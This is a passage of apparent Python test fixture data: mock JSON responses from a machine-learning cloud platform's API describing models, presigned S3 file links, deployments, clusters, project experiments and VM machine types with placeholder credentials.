"id": "some_id", "projectId": "some_project_id", "experimentId": "some_experiment_id", "updatedByUserId": "some_user_id", "updatedByUserEmail": "paperspace@paperspace.com", "modelType": "Tensorflow", "name": "some_name", "tag": None, "tags": [ "tag1", "tag2" ], "summary": None, "detail": None, "params": None, "url": "s3://ps-projects-development/asdf/some_project_id/some_experiment_id/model", "notes": None, "isDeleted": False, "isPublic": False, "dtCreated": "2019-12-13T23:00:26.077Z", "dtModified": "2019-12-13T23:00:26.077Z", "dtUploaded": None, "dtDeleted": None, "modelPath": None, "deploymentState": "Stopped" } ], "total": 96, "displayTotal": 1 } LIST_MODEL_FILES_RESPONSE_JSON = [ { "file": "hello.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/model/hello.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=7CT5k6buEmZe5k5E7g6BXMs2xV4%3D&response-content-disposition=attachment%3Bfilename%3D%22hello.txt%22&x-amz-security-token=some_amz_security_token" }, { "file": "hello2.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/model/hello2.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=L1lI47cNyiROzdYkf%2FF3Cm3165E%3D&response-content-disposition=attachment%3Bfilename%3D%22hello2.txt%22&x-amz-security-token=some_amz_security_token" }, { "file": "keton/elo.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/model/keton/elo.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=tHriojGx03S%2FKkVGQGVI5CQRFTo%3D&response-content-disposition=attachment%3Bfilename%3D%22elo.txt%22&x-amz-security-token=some_amz_security_token" } ] GET_DEPLOYMENT_DETAILS_JSON_RESPONSE = { "deploymentList": [ { "id": "some_id", "ownerId": "some_owner_id", "projectId": "some_project_id", "experimentId": "some_experiment_id", "state": "Stopped", "startedByUserId": "some_user_id", "startedByUserEmail": "some@address.com", "deploymentType": "TFServing", "deploymentTypeDescription": "Tensorflow Serving on K8s", "modelId": "some_model_id", "modelUrl": "s3://ps-projects/asdf/some/model/url", "name": "some_name", "tag": None, "params": None, "code": None, "cluster": "KPS Jobs", "clusterId": "some_cluster_id", "machineType": "p3.2xlarge", "imageUrl": "tensorflow/serving", "imageUsername": None, "imagePassword": None, "imageServer": None, "workspaceUrl": None, "workspaceUsername": None, "workspacePassword": None, "instanceCount": 1, "runningCount": 0, "error": None, "authToken": None, "annotations": {}, "oauthKey": None, "oauthSecret": None, "serviceType": "model", "apiType": "REST", "endpoint": "https://paperspace.io/model-serving/some_id:predict", "ports": None, "dtCreated": "2020-01-13T22:21:28.210Z", "dtModified": "2020-01-14T00:32:27.577Z", "dtBuildStarted": "2020-01-13T22:21:28.482Z", "dtBuildFinished": None, "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtStopped": "2020-01-13T22:48:40.107Z", "dtDeleted": None, "isDeleted": False, "modelType": "Tensorflow", "modelPath": None, "command": "some deployment command", "args": None, "env": None, "containerModelPath": None, "containerUrlPath": None, "endpointUrlPath": None, "method": None, "tags": ["tag1", "tag2"], "metricsURL": "aws-testing.paperspace.io", "autoscaling": { "minInstanceCount": 4, "maxInstanceCount": 64, "scaleCooldownPeriod": 123, "metrics": [ { "type": "Resource", "name": "cpu", "valueType": "targetAverage", "value": 10, }, { "type": "Metric", "name": "loss", "valueType": "target", "value": 2, }, { "type": "Metric", "name": "keton", "valueType": "target", "value": 21.37, }, ], }, }, ], "total": 129, "displayTotal": 129, "runningTotal": 0 } GET_CLUSTER_DETAILS_RESPONSE = { "id": "some_cluster_id", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "some_team_id", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 1, "isPrivate": True, "modelName": "team", "modelId": 1, "nodes": [ { "id": "cmsq4u0gf0m971f", "name": "default", "clusterId": "cluwffvkb", "activeJobId": None, "machineId": None, "dtCreated": "2019-11-21T10:06:27.602Z", "dtModified": "2019-11-21T10:06:27.602Z", "dtDeleted": None, "dtHeartbeat": None, "nodeAttrs": None } ] } GET_V1_CLUSTER_DETAILS_RESPONSE = { "id": "some_cluster_id", "name": "EKS testing", "type": "Job Cluster", "region": "Private", "cloud": "aws", "teamId": "some_team_id", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 1, "isPrivate": True, "modelName": "team", "modelId": 1, "nodes": [ { "id": "some_node_id", "name": "default", "clusterId": "some_cluster_id", "activeJobId": None, "machineId": None, "dtCreated": "2019-11-21T10:06:27.602Z", "dtModified": "2019-11-21T10:06:27.602Z", "dtDeleted": None, "dtHeartbeat": None, "nodeAttrs": None } ] } DETAILS_OF_PROJECT = { "data": [ { "name": "some_name", "handle": "some_id", "dtCreated": "2020-02-07T11:43:34.335Z", "dtDeleted": None, "lastJobSeqNum": 44, "repoNodeId": None, "repoName": None, "repoUrl": None, "tags": None, "buildPullRequests": True, "buildForks": False, "buildBranches": "default", "experiments": { "data": [ { "dtCreated": "2020-02-13T16:02:22.978027+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2020-02-13T16:02:22.978027+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 70590, "experimentTemplateId": 7156, "experimentTypeId": 2, "handle": "some_handle", "id": 70557, "projectHandle": "some_id", "projectId": 49107, "started_by_user_id": 192354, "state": 1, "templateHistory": { "cliCommand": "gradient experiments create multinode --name some_name --projectId some_id --experimentType GRPC --workerContainer python --workerMachineType c5.xlarge --workerCommand \"python script.py\" --workerCount 2 --parameterServerContainer python --parameterServerMachineType c5.xlarge --parameterServerCommand \"python script.py\" --parameterServerCount 1 --workspaceUrl s3://some_workspace.url --clusterId some_cluster_id --ports 5000:5000", "dtCreated": "2020-02-13T16:02:21.263923+00:00", "dtDeleted": None, "experimentTemplateId": 7156, "id": 70590, "params": { "cluster_id": "some_cluster_id", "is_preemptible": False, "name": "some_name", "parameter_server_command": "python script.py", "parameter_server_container": "python", "parameter_server_count": 1, "parameter_server_machine_type": "c5.xlarge", "parameter_server_use_dockerfile": False, "ports": "5000:5000", "project_handle": "some_id", "version": "v2", "worker_command": "python script.py", "worker_container": "python", "worker_count": 2, "worker_machine_type": "c5.xlarge", "worker_use_dockerfile": False, "workspace_url": "s3://some_workspace.url" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "some_id" }, "totalItems": 40 } } } ], "meta": { "where": { "handle": "some_id" }, "totalItems": 1 }, "tagFilter": [] } DETAILS_OF_PROJECT_WITH_TAGS = { "data": [ { "name": "some_name", "handle": "some_id", "dtCreated": "2020-02-07T11:43:34.335Z", "dtDeleted": None, "lastJobSeqNum": 44, "repoNodeId": None, "repoName": None, "repoUrl": None, "tags": [ "tag1", "tag2" ], "buildPullRequests": True, "buildForks": False, "buildBranches": "default", "experiments": { "data": [ { "dtCreated": "2020-02-13T16:02:22.978027+00:00", "dtDeleted": None, "dtFinished": None, "dtModified": "2020-02-13T16:02:22.978027+00:00", "dtProvisioningFinished": None, "dtProvisioningStarted": None, "dtStarted": None, "dtTeardownFinished": None, "dtTeardownStarted": None, "experimentError": None, "experimentTemplateHistoryId": 70590, "experimentTemplateId": 7156, "experimentTypeId": 2, "handle": "some_handle", "id": 70557, "projectHandle": "some_id", "projectId": 49107, "started_by_user_id": 192354, "state": 1, "templateHistory": { "cliCommand": "gradient experiments create multinode --name some_name --projectId some_id --experimentType GRPC --workerContainer python --workerMachineType c5.xlarge --workerCommand \"python script.py\" --workerCount 2 --parameterServerContainer python --parameterServerMachineType c5.xlarge --parameterServerCommand \"python script.py\" --parameterServerCount 1 --workspaceUrl s3://some_workspace.url --clusterId some_cluster_id --ports 5000:5000", "dtCreated": "2020-02-13T16:02:21.263923+00:00", "dtDeleted": None, "experimentTemplateId": 7156, "id": 70590, "params": { "cluster_id": "some_cluster_id", "is_preemptible": False, "name": "some_name", "parameter_server_command": "python script.py", "parameter_server_container": "python", "parameter_server_count": 1, "parameter_server_machine_type": "c5.xlarge", "parameter_server_use_dockerfile": False, "ports": "5000:5000", "project_handle": "some_id", "version": "v2", "worker_command": "python script.py", "worker_container": "python", "worker_count": 2, "worker_machine_type": "c5.xlarge", "worker_use_dockerfile": False, "workspace_url": "s3://some_workspace.url" }, "triggerEvent": None, "triggerEventId": None } } ], "meta": { "itemGroup": { "key": "projectHandle", "value": "some_id" }, "totalItems": 40 } } } ], "meta": { "where": { "handle": "some_id" }, "totalItems": 1 }, "tagFilter": [] } EXAMPLE_CLUSTERS_LIST_RESPONSE = [ { "id": "cluster_id_1", "name": "cluster name 1", "type": "Job Cluster", "region": "Private", "cloud": "private", "teamId": "team_id", "isDefault": True, "dtCreated": "2019-07-05T23:28:17.416Z", "dtModified": "2019-07-05T23:28:17.416Z", "clusterId": 91, "isPrivate": True, "modelName": "team", "modelId": 1170 }, { "id": "cluster_id_2", "name": "cluster name 2", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "team_id", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 }, { "id": "cluster_id_3", "name": "cluster name 3", "type": "Job Cluster", "region": "Private", "cloud": "gcp", "teamId": "team_id", "isDefault": False, "dtCreated": "2019-10-29T18:42:50.985Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 100, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] LIMITED_EXAMPLE_CLUSTERS_LIST_RESPONSE = [ { "id": "cluster_id_1", "name": "cluster name 1", "type": "Job Cluster", "region": "Private", "cloud": "private", "teamId": "team_id", "isDefault": True, "dtCreated": "2019-07-05T23:28:17.416Z", "dtModified": "2019-07-05T23:28:17.416Z", "clusterId": 91, "isPrivate": True, "modelName": "team", "modelId": 1170 }, { "id": "cluster_id_2", "name": "cluster name 2", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "team_id", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2019-11-21T18:12:27.723Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] LIST_OF_VM_MACHINE_TYPES = { "92": [ { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 35, "capacityId": 21, "vmType": { "label": "c5.xlarge", "kind": "aws-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:12:41.506Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 35, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 35, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 131, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 36, "capacityId": 22, "vmType": { "label": "c5.4xlarge", "kind": "aws-cpu", "cpus": 16, "ram": "34359738368", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:14:06.425Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "medium", "id": 36, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 36, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 132, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 38, "capacityId": 23, "vmType": { "label": "p2.xlarge", "kind": "aws-gpu", "cpus": 4, "ram": "65498251264", "gpuModelId": 11, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "small", "id": 38, "gpuModel": { "model": "passthrough", "label": "Tesla K80", "gpuGroupId": 8, "memInBytes": "12884901888", "memInMb": 12288, "memInGb": "12", "id": 11 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 38, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 134, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 39, "capacityId": 24, "vmType": { "label": "p3.2xlarge", "kind": "aws-gpu", "cpus": 8, "ram": "65498251264", "gpuModelId": 10, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "medium", "id": 39, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 39, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 135, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 40, "capacityId": 25, "vmType": { "label": "p3.16xlarge", "kind": "aws-gpu", "cpus": 64, "ram": "523986010112", "gpuModelId": 10, "gpuCount": 8, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "large", "id": 40, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 40, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:14.282Z", "isPreemptible": False, "id": 136, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clqr4b0ox", "name": "KPS Jobs", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-07-22T14:50:10.170Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 92, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] } ], "102": [ { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 65, "capacityId": 32, "vmType": { "label": "Wolfpass-CPU", "kind": "cpu", "cpus": 24, "ram": "34359738368", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-11-11T19:53:21.298Z", "dtModified": "2019-11-19T19:09:03.288Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 65, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 65, "type": "hourly", "usageRateId": 18, "dtCreated": "2019-11-11T19:57:04.870Z", "isPreemptible": False, "id": 150, "usageRate": { "description": "VIP", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "VIP", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": False, "numCpus": 2, "ramInBytes": "4294967296", "id": 18 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "clfe0kr2p", "name": "Intel Wolfpass KPS", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "intelwolfpass", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-11T16:34:29.495Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 102, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] } ], "103": [ { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 35, "capacityId": 33, "vmType": { "label": "c5.xlarge", "kind": "aws-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:12:41.506Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 35, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 35, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 131, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 36, "capacityId": 34, "vmType": { "label": "c5.4xlarge", "kind": "aws-cpu", "cpus": 16, "ram": "34359738368", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:14:06.425Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "medium", "id": 36, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 36, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:32:41.602Z", "isPreemptible": False, "id": 132, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 37, "capacityId": 35, "vmType": { "label": "c5.24xlarge", "kind": "aws-cpu", "cpus": 94, "ram": "206158430208", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:14:06.425Z", "dtModified": "2019-08-28T17:40:50.773Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "large", "id": 37, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 37, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 133, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 39, "capacityId": 36, "vmType": { "label": "p3.2xlarge", "kind": "aws-gpu", "cpus": 8, "ram": "65498251264", "gpuModelId": 10, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "medium", "id": 39, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 39, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:05.626Z", "isPreemptible": False, "id": 135, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 40, "capacityId": 37, "vmType": { "label": "p3.16xlarge", "kind": "aws-gpu", "cpus": 64, "ram": "523986010112", "gpuModelId": 10, "gpuCount": 8, "internalDescription": None, "dtCreated": "2019-07-22T15:20:22.108Z", "dtModified": "2019-08-28T17:40:50.779Z", "isPreemptible": False, "deploymentType": "gpu", "deploymentSize": "large", "id": 40, "gpuModel": { "model": "passthrough", "label": "Tesla V100", "gpuGroupId": 7, "memInBytes": "17179869184", "memInMb": 16384, "memInGb": "16", "id": 10 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 40, "type": "hourly", "usageRateId": 10, "dtCreated": "2019-07-22T15:33:14.282Z", "isPreemptible": False, "id": 136, "usageRate": { "description": "Employee", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "Employee", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": True, "numCpus": 2, "ramInBytes": "4294967296", "id": 10 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 66, "capacityId": 38, "vmType": { "label": "c5.xlarge", "kind": "eks-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-11-27T11:08:38.641Z", "dtModified": "2019-11-27T11:08:38.641Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 66, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 66, "type": "hourly", "usageRateId": 18, "dtCreated": "2019-11-27T11:59:58.059Z", "isPreemptible": False, "id": 151, "usageRate": { "description": "VIP", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "VIP", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": False, "numCpus": 2, "ramInBytes": "4294967296", "id": 18 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", "dtModified": "2020-02-28T20:58:26.134Z", "clusterId": 103, "isPrivate": True, "modelName": "team", "modelId": 1170 } ] }, { "showDisabled": False, "isAvailable": True, "isPreemptible": False, "vmTypeId": 66, "capacityId": 39, "vmType": { "label": "c5.xlarge", "kind": "eks-cpu", "cpus": 4, "ram": "8589934592", "gpuModelId": 6, "gpuCount": 1, "internalDescription": None, "dtCreated": "2019-11-27T11:08:38.641Z", "dtModified": "2019-11-27T11:08:38.641Z", "isPreemptible": False, "deploymentType": "cpu", "deploymentSize": "small", "id": 66, "gpuModel": { "model": "None", "label": "None", "gpuGroupId": 3, "memInBytes": "0", "memInMb": 0, "memInGb": "0", "id": 6 }, "availableTemplatesWithOperatingSystems": [], "availableRegions": [], "permissions": [], "defaultUsageRates": [ { "vmTypeId": 66, "type": "hourly", "usageRateId": 18, "dtCreated": "2019-11-27T11:59:58.059Z", "isPreemptible": False, "id": 151, "usageRate": { "description": "VIP", "rate": "0.00", "type": "monthly", "gpuModelId": 1, "rateHourly": "0.00", "rateMonthly": "0.00", "label": "VIP", "period": "monthly", "kind": "air", "isEarlyAccess": False, "isEmployeeOnly": False, "numCpus": 2, "ramInBytes": "4294967296", "id": 18 } } ], "defaultUsageRateOverrides": [] }, "clusters": [ { "id": "cluwffvkb", "name": "EKS testing", "type": "Kubernetes Processing Site", "region": "Private", "cloud": "aws", "teamId": "teo6raui0", "isDefault": False, "dtCreated": "2019-11-21T07:27:37.010Z", 